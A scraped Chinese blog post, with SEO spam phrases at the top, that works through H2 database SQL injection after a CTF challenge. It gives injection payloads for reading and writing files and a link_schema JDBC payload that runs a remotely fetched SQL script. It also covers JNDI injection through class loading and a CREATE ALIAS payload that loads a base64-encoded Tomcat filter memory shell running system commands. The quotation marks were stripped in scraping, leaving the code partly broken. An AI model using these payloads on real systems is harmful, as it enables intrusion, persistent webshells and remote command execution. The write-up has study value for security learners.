微网站的建设,在线免费网站排名优化,为什么做网站必须要用域名,梅陇做网站起初是在N1 Junior 2025 上面碰到一题#xff0c;考点是h2的sql注入。由于之前没有见过#xff0c;趁此机会系统学习一番 实验代码 public class H2Inject {public static void main(String[] args) throws Exception{JdbcDataSource dataSource new JdbcDataSource();dataS…起初是在N1 Junior 2025 上面碰到一题考点是h2的sql注入。由于之前没有见过趁此机会系统学习一番 实验代码 public class H2Inject {public static void main(String[] args) throws Exception{JdbcDataSource dataSource new JdbcDataSource();dataSource.setURL(jdbc:h2:mem:testdb;DB_CLOSE_DELAY-1);dataSource.setUser(asd);dataSource.setPassword();Connection connection dataSource.getConnection();Statement statement connection.createStatement();statement.execute(CREATE TABLE IF NOT EXISTS users (id INT PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL););statement.executeUpdate(INSERT INTO users (id, username, password) VALUES (1, admin, admin););String username admin;statement.executeQuery(String.format(select * from users where username %s ,username));ResultSet resultSet statement.getResultSet();boolean next resultSet.next();while(next){String string1 resultSet.getString(1);String string2 resultSet.getString(2);String string3 resultSet.getString(3);System.out.println(string1);System.out.println(string2);System.out.println(string3);next resultSet.next();}}
}
读文件
翻阅官方文档 只输入文件名一个参数效果也是一样的。 写文件 文件是成功写入的为什么会报错呢
Caused by: java.lang.NumberFormatException: For input string: admin
原因就是获取结果的时候先看第一行对应列是什么数据类型决定了后面几行的数据类型。
file_write的返回结果是数字所以决定了该列是数字类型所以查询出来的admin转换成数字的时候就报错。
不过有个地方不明白为什么union select后面的结果会到第一行去
发起jdbc连接 link_schema是表函数接在from的后面。
既然可以使用jdbc连接那么就去连接h2数据库并且设置INIT脚本执行远程sql代码。
利用方式
String username admin union select 1,1,1 from link_schema(TEST2, , jdbc:h2:mem:testdb1;TRACE_LEVEL_SYSTEM_OUT3;INITRUNSCRIPT FROM http://127.0.0.1:8989/hello.sql, sa, sa, PUBLIC)--;这里存在引号嵌套需要进行转义有几个注意点
h2中单引号括起来的是字符串双引号括起来的表示列名。单引号转义不用反斜杠而是用2个单引号来表示一个单引号 假设题目不出网则可以先将sql脚本写入到目标机器再发起jdbc连接。
JNDI注入
我们分析link_schema函数的底层代码实现
看LinkSchemaFunction的getValue方法
后续会进入JdbcUtils的getConnection注意driver和url两个参数 一直跟进到下面的位置。
有2处利用第一处如果url以jdbc:h2开头则发起jdbc连接否则对driver进行类加载 跟进loadUserClass 首先检查allowedClassNames这里默认是*也就是所有类都allowed。 后面就是用Class.forName进行类加载。
类加载完成后回到getConnection。 如果加载的类是驱动则进行newInstance如果是Context则发起jndi连接。
那么直接加载javax.naming.InitialContext打jndi。
可惜的是高版本的h2依赖添加了jndi限制url必须以java:开头。
查看源码发现2.1.x全版本都有限制2.0.x 2.0.206 无限制。 打内存马
继续发散 假如题目不出网无法弹shell那就需要内存马方便执行命令。
直接用Filter型内存马首先写入到目标机器再加载。
CREATE ALIAS EXEC AS void e(String cmd) throws Exception{String evilClassBase64 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nAQAyTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9BcHBsaWNhdGlvbkZpbHRlckNvbmZpZzsBAA1maWx0ZXJDb25maWdzAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAWUxqYXZhL3V0aWwvSGFzaE1hcDxMamF2YS9sYW5nL1N0cmluZztMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOz47AQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAARhcmcwAQAHcmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47BwEHBwDsBwDzBwEDBwEIBwEJBwEKBwECBwELBwEMAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcBDQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAHZGVzdHJveQEAClNvdXJjZUZpbGUBABBGaWx0ZXJTaGVsbC5qYXZhDAEOAQ8HARAMAREBEgcBEwwBFAEVDAEWARcMARgBGQwBGgEbBwEGAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAEcAR0MAGMAZAwBHgEdDAEfASAMAHkAegcBIQwBIgEjDAEkASUBADBvcmcvYXBhY2hlL2NhdGFsaW5hL2xvYWRlci9XZWJhcHBDbGFzc0xvYWRlckJhc2UMAHMAdAEALW9yZy9hcGFjaGUvY2F0YWxpbmEvd2VicmVzb3VyY2VzL1N0YW5kYXJkUm9vdAwBJgEnAQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEABWZmZmZmAQAvb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXAMASgBKQEAAi8qDAEqASkBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZgwBKwEsAQAwb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAPamF2YS9sYW5nL0NsYXNzAQAbb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0AQAQamF2YS9sYW5nL09iamVjdAwASwBMAQARamF2YS91dGlsL0hhc2hNYXAMAS0BLgwBLwEwDAExATIBAANjbWQHAQgMATMBNAcBCQwBNQE2AQAAAQAHb3MubmFtZQcBNwwBOAE0DAE5AToBAAN3aW4MATsBPAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAHkBPQEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDAEAT8HAUAMAUEBQgwAeQFDAQACXEEMAUQBRQwBRgFHDAFIAToMAUkAegcBBwwBSgEpDAFLAHoHAQoMAI0BTAEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAtGaWx0ZXJTaGVsbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9pby9QcmludFdyaXRlcgEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAB1zdW4vcmVmbGVjdC9SZWZsZWN0aW9uRmFjdG9yeQEAFGdldFJlZmxlY3Rpb25GYWN0b3J5AQAhKClMc3VuL3JlZmxlY3QvUmVmbGVjdGlvbkZhY3Rvcnk7AQAebmV3Q29uc3RydWN0b3JGb3JTZXJpYWxpemF0aW9uAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANZ2V0U3VwZXJjbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAhnZXRDbGFzcwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAApnZXRDb250ZXh0AQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0OwEADXNldEZpbHRlck5hbWUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA1hZGRVUkxQYXR0ZXJuAQAJc2V0RmlsdGVyAQAZKExqYXZheC9zZXJ2bGV0L0ZpbHRlcjspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjspVgEADGFkZEZpbHRlck1hcAEANChMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7KVYBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRh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;byte[] bytes java.util.Base64.getDecoder().decode(evilClassBase64);java.lang.reflect.Method method ClassLoader.class.getDeclaredMethod(defineClass, String.class, byte[].class, int.class, int.class);method.setAccessible(true);((Class)method.invoke(ClassLoader.getSystemClassLoader(), FilterShell, bytes, 0, bytes.length)).newInstance();};
CALL EXEC(calc);
测试代码 打入成功
